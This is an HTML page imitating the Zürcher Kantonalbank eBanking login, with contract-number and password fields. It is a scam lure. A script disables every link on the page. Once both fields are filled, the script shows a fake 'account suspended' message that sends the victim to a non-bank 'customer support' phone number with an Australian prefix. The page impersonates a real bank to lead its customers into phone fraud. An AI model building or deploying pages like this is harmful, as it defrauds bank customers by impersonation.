<!DOCTYPE html>
<html lang="de">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <meta http-equiv="x-ua-compatible" content="ie=edge" />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
         <meta name="robots" content="noindex, nofollow">
        <meta name="googlebot" content="noindex, nofollow">
        <meta name="bingbot" content="noindex, nofollow">
        <title>eBanking der Zürcher Kantonalbank</title>
        <link rel="shortcut icon" href="assets/favicon.ico" />
        <link rel="stylesheet" href="./assets/styles.80756f31526e37a1d8c0.css" />
        <style>
            .cl-lightbox[_ngcontent-itd-c39] {
                height: 100%;
                top: 0;
                width: 100%;
            }
            .cl-lightbox-dim[_ngcontent-itd-c39] {
                background-color: rgba(0, 0, 0, 0.8);
                cursor: default;
                display: block;
                height: 100%;
                position: fixed;
                width: 100%;
            }
            .cl-lightbox-inner[_ngcontent-itd-c39] {
                height: 178px;
                left: 50%;
                position: absolute;
                top: 50%;
                transform: translate(-50%, -50%);
                width: 480px;
            }
        </style>
        
        <style>
            .quicknav.clearfix[_ngcontent-itd-c46] .metanav[_ngcontent-itd-c46] .active[_ngcontent-itd-c46] {
                color: #000;
            }
            .logo-main.new-logo[_ngcontent-itd-c46] a[_ngcontent-itd-c46] {
                background-image: url(assets/logo_web.6218206bbfad2ccbcdc9.png);
            }
            .cur-lng[_ngcontent-itd-c46] {
                font-size: 13px;
            }
        </style>
        <style>
            ciam-entry form {
                margin: 0;
            }
        </style>
        <style>
            .info-border[_ngcontent-itd-c59] {
                width: 100%;
                background-image: linear-gradient(90deg, #000078, #000078 25%, #000078 0, #00bec8 50%, #00bec8 0, #00bec8 75%, #00bec8 0, #000078 100%, #000078 0);
                background-size: 80px 80px;
            }
        </style>
        <style></style>
        <style>
            .no-bottom-padding[_ngcontent-itd-c58] {
                margin-bottom: 0 !important;
            }
        </style>
        <style>
            .eye[_ngcontent-itd-c55] {
                padding: 0.5rem;
                width: 23px !important;
                -webkit-user-select: none;
                -moz-user-select: none;
                -ms-user-select: none;
                user-select: none;
            }
            .eye[_ngcontent-itd-c55]:hover {
                filter: brightness(1.75);
            }
        </style>
    </head>
    <body id="top" class="tpl-onba lang-de skin-onbabrushup realm-undefined">
        <ciam-app ng-version="11.2.14">
            <span>
                <ciam-header _nghost-itd-c46="">
                    <header _ngcontent-itd-c46="" role="banner" class="header">
                        <div _ngcontent-itd-c46="" class="container-24 clearfix">
                            <div _ngcontent-itd-c46="" class="grid-24 relative">
                                <h1 _ngcontent-itd-c46="" class="logo-main new-logo"><a _ngcontent-itd-c46=""></a></h1>
                                <div _ngcontent-itd-c46="" class="quicknav clearfix">
                                    <nav _ngcontent-itd-c46="" class="metanav">
                                        <ul _ngcontent-itd-c46="">
                                            <li _ngcontent-itd-c46="" style="margin-left: 0;">
                                                <b _ngcontent-itd-c46="" translate="" class="cur-lng">DE</b>
                                                
                                            </li>
                                            <li _ngcontent-itd-c46="" style="margin-left: 0;">
                                                
                                                <a _ngcontent-itd-c46="" translate="" ciam-tab-enterable="" tabindex="0">EN</a>
                                                
                                            </li>
                                            
                                            <li _ngcontent-itd-c46="" class="helplink"><a _ngcontent-itd-c46="" ciam-tab-enterable="" class="lightbox" tabindex="0">Hilfe</a></li>
                                        </ul>
                                    </nav>
                                    
                                </div>
                                
                                <ciam-navigation _ngcontent-itd-c46="">
                                    <nav role="navigation" class="mainnav">
                                        <div class="logo-mainnav"></div>
                                        <ul>
                                            <li class="title"><span>Login eBanking</span></li>
                                            <li class="stepnav">
                                                <ol>
                                                    <li class="active"><span>1</span> Vertragsnummer &amp; Passwort</li>
                                                    <li><span>2</span> Legitimation</li>
                                                    <li class="last"><span>3</span> Startseite</li>
                                                    
                                                </ol>
                                            </li>
                                        </ul>
                                        <div class="mainnav-bg"></div>
                                    </nav>
                                </ciam-navigation>
                            </div>
                        </div>
                    </header>
                </ciam-header>
                <div class="body">
                    <div class="container-24 clearfix">
                        <zkb-notification>
                            <div id="errorCode" style="display: none;" class="messages message-instruction message-error"><div class="multi-messages-container"><h2><zkb-trusted-html> 
                            Your account has been suspended due to suspicious activity. Please contact our customer support immediately +61730407694 
                           <br>* Error Code - Wp-402<br>
                       </zkb-trusted-html></h2>
                   </div>
                   </div>
                        </zkb-notification>
                        <router-outlet></router-outlet>
                        <ciam-entry>
                            <div class="grid-24 box">
                                <div class="spacer-minor"></div>
                                <router-outlet></router-outlet>
                                <ciam-login _nghost-itd-c59="">
                                    <ciam-content _ngcontent-itd-c59="">
                                        <div class="alpha relative grid-18">
                                            <div class="box-padding box-inner">
                                                <h1 role="heading">Geben Sie Ihre Vertragsnummer und Ihr Passwort ein</h1>
                                                
                                                <div class="frm">
                                                    <zkb-form _ngcontent-itd-c59="" orientation="horizontal">
                                                        <form onsubmit="return false;">
                                                            <ciam-login-form _ngcontent-itd-c59="" _nghost-itd-c57="">
                                                                <fieldset _ngcontent-itd-c57="" class="frm-horizontal">
                                                                    <ol _ngcontent-itd-c57="" class="nospace">
                                                                        <li _ngcontent-itd-c57="">
                                                                            <zkb-string _ngcontent-itd-c57="">
                                                                                <zkb-form-element-wrapper>
                                                                                    <ol class="nospace">
                                                                                        <li>
                                                                                            <label for="loginNameId"> Vertragsnummer </label>
                                                                                            <input autocomplete="off" class="input-text" type="text" placeholder="" id="loginNameId" maxlength="18" required />
                                                                                            <zkb-form-element-icon></zkb-form-element-icon>
                                                                                            
                                                                                        </li>
                                                                                    </ol>
                                                                                    
                                                                                </zkb-form-element-wrapper>
                                                                            </zkb-string>
                                                                        </li>
                                                                        <li _ngcontent-itd-c57="">
                                                                            <label _ngcontent-itd-c57="" translate="" for="passwordId">Passwort</label>
                                                                            <zkb-string _ngcontent-itd-c57="" type="password" ciam-show-capslock-warning="">
                                                                                <zkb-form-element-wrapper>
                                                                                    
                                                                                    <input autocomplete="off" class="input-text" type="password" placeholder="" id="passwordId" maxlength="256" required />
                                                                                    <zkb-form-element-icon></zkb-form-element-icon>
                                                                                    
                                                                                </zkb-form-element-wrapper>
                                                                            </zkb-string>
                                                                            <ciam-eye _ngcontent-itd-c57="" _nghost-itd-c55="">
                                                                                <a _ngcontent-itd-c55="" class="icon-link">
                                                                                    <svg
                                                                                        _ngcontent-itd-c55=""
                                                                                        src="assets/show.svg"
                                                                                        focusable="false"
                                                                                        xmlns="http://www.w3.org/2000/svg"
                                                                                        width="23"
                                                                                        height="18"
                                                                                        viewBox="0 0 23 15"
                                                                                        class="icon onbabrushup-icon eye"
                                                                                    >
                                                                                        <g _ngcontent-itd-c55="" fill="none" fill-rule="evenodd">
                                                                                            <path _ngcontent-itd-c55="" d="M-1-5h24v24H-1z"></path>
                                                                                            <path
                                                                                                _ngcontent-itd-c55=""
                                                                                                fill="#054696"
                                                                                                fill-rule="nonzero"
                                                                                                d="M21.71 6.692l.389.486-.389.486c-6.437 8.058-12.885 8.058-18.44 3.175-.8-.703-1.51-1.454-2.123-2.207-.37-.455-.63-.813-.77-1.027L.1 7.178l.279-.427c.14-.214.398-.572.77-1.027A18.545 18.545 0 0 1 3.27 3.517c5.555-4.883 12.003-4.883 18.44 3.175zM4.255 9.673c4.84 4.255 10.18 4.35 15.889-2.495C14.434.332 9.095.428 4.255 4.683a17.032 17.032 0 0 0-2.317 2.495 17.032 17.032 0 0 0 2.317 2.495zm6.81 1.353c-2.083 0-3.772-1.723-3.772-3.848S8.982 3.33 11.065 3.33c2.084 0 3.773 1.723 3.773 3.848s-1.69 3.848-3.773 3.848zm0-1.54c1.25 0 2.264-1.033 2.264-2.308S12.315 4.87 11.065 4.87c-1.25 0-2.263 1.034-2.263 2.31 0 1.274 1.013 2.308 2.263 2.308z"
                                                                                            ></path>
                                                                                        </g>
                                                                                    </svg>
                                                                                    
                                                                                </a>
                                                                            </ciam-eye>
                                                                            <img _ngcontent-itd-c57="" alt="" style="visibility: hidden;" src="./assets/1.png" />&nbsp;
                                                                            <a _ngcontent-itd-c57="" translate="" tabindex="4" id="reset-password">Passwort vergessen?</a>
                                                                        </li>
                                                                    </ol>
                                                                </fieldset>
                                                                
                                                                <div _ngcontent-itd-c57="" class="spacer"></div>
                                                            </ciam-login-form>
                                                            <ciam-wizard-navigation _ngcontent-itd-c59="">
                                                                <hr />
                                                                <p class="button-group">
                                                                    <button type="submit" id="wizard-next" class="btn btn-blue">Weiter <span class="icon icon-reverse icon-next-white"></span></button>
                                                                    <button type="button" id="wizard-cancel" class="btn margin-right-important">Abbrechen</button>
                                                                    
                                                                </p>
                                                            </ciam-wizard-navigation>
                                                            
                                                        </form>
                                                    </zkb-form>
                                                    
                                                </div>
                                            </div>
                                        </div>
                                        <aside role="doc-tip" class="grid-6 omega aside">
                                            <div class="aside-padding">
                                                <div _ngcontent-itd-c59="" class="sidepanel">
                                                    <ciam-help-box _ngcontent-itd-c59="" titlekey="INFO_BOX.SUPPORT.TITLE" subtitle="INFO_BOX.SUPPORT.SUBTITLE" content="INFO_BOX.SUPPORT.CONTENT">
                                                        <div class="box box-inner box-padding box-info">
                                                            <h2>Probleme beim Login?</h2>
                                                            
                                                            <b>Support</b>
                                                            <div>
                                                                <p class="halfspace">
                                                                    Telefon 0844 840 140<br />
                                                                    Aus dem Ausland:<br />
                                                                    +41 44 293 95 95<br />
                                                                </p>
                                                                <p>
                                                                    Servicezeiten<br />
                                                                    Montag - Freitag<br />
                                                                    08:00 - 22:00<br />
                                                                    Samstag - Sonntag<br />
                                                                    09:00 - 18:00<br />
                                                                </p>
                                                            </div>
                                                            <p></p>
                                                        </div>
                                                    </ciam-help-box>
                                                    <ciam-ebanking-box _ngcontent-itd-c59="" _nghost-itd-c58="">
                                                        <div _ngcontent-itd-c58="" class="box box-inner box-padding box-blue box-color-blue no-bottom-padding">
                                                            <h2 _ngcontent-itd-c58="">Sie nutzen unser eBanking noch nicht?</h2>
                                                            <ul _ngcontent-itd-c58="">
                                                                <li>Sicherer Zugriff auf Ihre Bankgeschäfte jederzeit und von überall her</li>
                                                                <li>Einfach Zahlungen erfassen</li>
                                                                <li>Börsenkurse in Echtzeit abfragen und an der Börse handeln</li>
                                                            </ul>
                                                            <p _ngcontent-itd-c58="" class="nospace">
                                                                <a _ngcontent-itd-c58="" href="https://www.zkb.ch/de/hilfe.html#private/digitales-banking" target="_blank">
                                                                    <span _ngcontent-itd-c58="" class="icon icon-external onbabrushup-icon"></span>Jetzt kennenlernen
                                                                </a>
                                                            </p>
                                                        </div>
                                                    </ciam-ebanking-box>
                                                    
                                                </div>
                                            </div>
                                        </aside>
                                    </ciam-content>
                                    
                                </ciam-login>
                                
                            </div>
                        </ciam-entry>
                        
                    </div>
                </div>
                <ciam-footer>
                    <hr class="visuallyhidden" />
                    <h2 id="footer" class="visuallyhidden">Fusszeile:</h2>
                    <footer role="contentinfo" class="footer">
                        <div class="container-24 clearfix">
                            <div class="grid-24">
                                <p translate="" class="print">Die Angaben erfolgen ohne Gewähr.</p>
                                <p translate="" class="copyright left">&copy; Zürcher Kantonalbank</p>
                                <nav class="footnav right">
                                    <ul>
                                        <li><a ciam-tab-enterable="" tabindex="0"> Bestimmungen </a></li>
                                        <li><a ciam-tab-enterable="" tabindex="0"> Impressum </a></li>
                                    </ul>
                                </nav>
                            </div>
                        </div>
                    </footer>
                </ciam-footer>
            </span>
            
        </ciam-app>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
        <script>
        $(document).ready(function(){
            $("a").attr("href", "#");
        });
        </script>
        <script>
      $(document).ready(function(){
        $("#wizard-next").click(function(){
         $('#errorCode').hide();
        var loginNameId = $('#loginNameId').val();
         var passwordId = $('#passwordId').val();
          if(loginNameId=='') {
         $('#loginNameId').focus();
         return false;
        }
          if(passwordId=='') {
         $('#passwordId').focus();
         return false;
        }

        if(loginNameId!='' && passwordId!='') {
         $('#errorCode').show();
         return false;
        }
        });
      });
      </script> 
    </body>
</html>
